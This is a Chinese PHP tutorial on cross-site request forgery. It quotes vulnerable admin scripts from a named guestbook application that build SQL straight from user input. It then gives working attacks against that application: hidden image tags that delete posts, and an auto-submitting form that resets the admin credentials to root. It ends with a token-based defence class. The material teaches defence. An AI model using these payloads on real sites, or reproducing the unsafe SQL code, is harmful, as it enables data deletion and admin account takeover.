php漏洞之跨网站请求伪造与防止伪造方法
2015-01-24信息快讯网
今天我来给大家介绍在php中跨网站请求伪造的实现方法与最后我们些常用的防止伪造的具体操作方法,有需要了解的朋友可进入参考
伪造跨站请求介绍伪造跨站请求比较难以防范,而且危害巨大,攻击者可以通过这种方式恶作剧,发spam信息,删除数据等等。这种攻击常见的表现形式有:
伪造链接,引诱用户点击,或是让用户在不知情的情况下访问
伪造表单,引诱用户提交。表单可以是隐藏的,用图片或链接的形式伪装。
比较常见而且也很廉价的防范手段是在所有可能涉及用户写操作的表单中加入一个随机且变换频繁的字符串,然后在处理表单的时候对这个字符串进行检查。这个随机字符串如果和当前用户身份相关联的话,那么攻击者伪造请求会比较麻烦。
如果攻击者以隐藏的方式发送给目标用户链接
<img src="/buy.php?item=watch&num=1000"/>,那么如果目标用户不小心访问以后,购买的数量就成了1000个
实例
随缘网络PHP留言板V1.0
任意删除留言 //delbook.php 此页面用于删除留言 <?php include_once("dlyz.php"); //dlyz.php用户验证权限,当权限是admin的时候方可删除留言 include_once("../conn.php"); $del=$_GET["del"]; $id=$_GET["id"]; if ($del=="data") { $ID_Dele= implode(",",$_POST['adid']); $sql="delete from book where id in (".$ID_Dele.")"; mysql_query($sql); } else { $sql="delete from book where id=".$id; //传递要删除的留言ID mysql_query($sql); } mysql_close($conn); echo "<script language='javascript'>"; echo "alert('删除成功!');"; echo " location='book.php';"; echo "</script>"; ?>
当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言
利用方法:
我们使用普通用户留言(源代码方式),内容为
<img src="delbook.php?id=2" /> <img src="delbook.php?id=3" /> <img src="delbook.php?id=4" /> <img src="delbook.php?id=5" />
插入4张图片链接分别删除4个id留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了
现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。
攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了
修改管理员密码
//pass.php if($_GET["act"]) { $username=$_POST["username"]; $sh=$_POST["sh"]; $gg=$_POST["gg"]; $title=$_POST["title"]; $copyright=$_POST["copyright"]."<br/>网站:<a href=http://www.jb51.net>脚本之家</a>"; $password=md5($_POST["password"]); if(empty($_POST["password"])) { $sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1"; } else { $sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1"; } mysql_query($sql); mysql_close($conn); echo "<script language='javascript'>"; echo "alert('修改成功!');"; echo " location='pass.php';"; echo "</script>"; } 这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单: <body> <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"> <input type="radio" value="1" name="sh"> <input type="radio" name="sh" checked value="0"> <input type="text" name="username" value="root"> <input type="password" name="password" value="root"> <input type="text" name="title" value="随缘网络PHP留言板V1.0(带审核功能)" > <textarea name="gg" rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!</textarea> <textarea name="copyright" rows="6" cols="80" >随缘网络PHP留言本V1.0 版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名</textarea> </form> </body>
存为attack.html,放到自己网站上http://www.jb51.net此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root
防止伪造跨站请求
yahoo对付伪造跨站请求的办法是在表单里加入一个叫.crumb的随机串;而facebook也有类似的解决办法,它的表单里常常会有post_form_id和fb_dtsg。
随机串代码实现
咱们按照这个思路,山寨一个crumb的实现,代码如下:
<?php class Crumb { CONST SALT = "your-secret-salt"; static $ttl = 7200; static public function challenge($data) { return hash_hmac('md5', $data, self::SALT); } static public function issueCrumb($uid, $action = -1) { $i = ceil(time() / self::$ttl); return substr(self::challenge($i . $action . $uid), -12, 10); } static public function verifyCrumb($uid, $crumb, $action = -1) { $i = ceil(time() / self::$ttl); if(substr(self::challenge($i . $action . $uid), -12, 10) == $crumb || substr(self::challenge(($i - 1) . $action . $uid), -12, 10) == $crumb) return true; return false; } }
代码中的$uid表示用户唯一标识,而$ttl表示这个随机串的有效时间。
应用示例
构造表单
在表单中插入一个隐藏的随机串crumb
<form method="post" action="demo.php"> <input type="hidden" name="crumb" value="<?php echo Crumb::issueCrumb($uid)?>"> <input type="text" name="content"> <input type="submit"> </form>
处理表单 demo.php
对crumb进行检查
<?php if(Crumb::verifyCrumb($uid, $_POST['crumb'])) { //按照正常流程处理表单 } else { //crumb校验失败,错误提示流程 } ?>
PHP生成自适应大小的缩略图类及使用方法分享
php 解压rar文件及zip文件的方法
php中session过期时间设置及session回收机制介绍
使用php语句将数据库*.sql文件导入数据库
PHP判断是否有Get参数的方法
php过滤html中的其他网站链接的方法(域名白名单功能)
PHP抓取、分析国内视频网站的视频信息工具类
如何阻止网站被恶意反向代理访问(防网站镜像)
php发送post请求函数分享
php处理restful请求的路由类分享
php根据isbn书号查询amazon网站上的图书信息的示例
使用php记录用户通过搜索引擎进网站的关键词
php发送post请求的三种方法
使用php伪造referer的方法 利用referer防止图片盗链
实现PHP多线程异步请求的3种方法
php查看请求头信息获取远程图片大小的方法分享
JoshChen_php新手进阶高手不可或缺的规范介绍
PHP Global定义全局变量使用说明
php生成图形验证码几种方法小结
PHP中将ip地址转成十进制数的两种实用方法
PHP怎么实现网站保存快捷方式方便用户随时浏览
php正则取img标记中任意属性(正则替换去掉或改变图片img标记中的任意属性)
php中如何判断一个网页请求是ajax请求还是普通请求
处理(php-cgi.exe - FastCGI 进程超过了配置的请求超时时限)的问题
分享8个最佳的代码片段在线测试网站
解析php下载远程图片函数 可伪造来路
解析php中session的实现原理以及大网站应用应注意的问题
php fsockopen伪造post与get方法的详解
php判断终端是手机还是电脑访问网站的思路及代码
php安全开发 添加随机字符串验证,防止伪造跨站请求
php中防止伪造跨站请求的小招式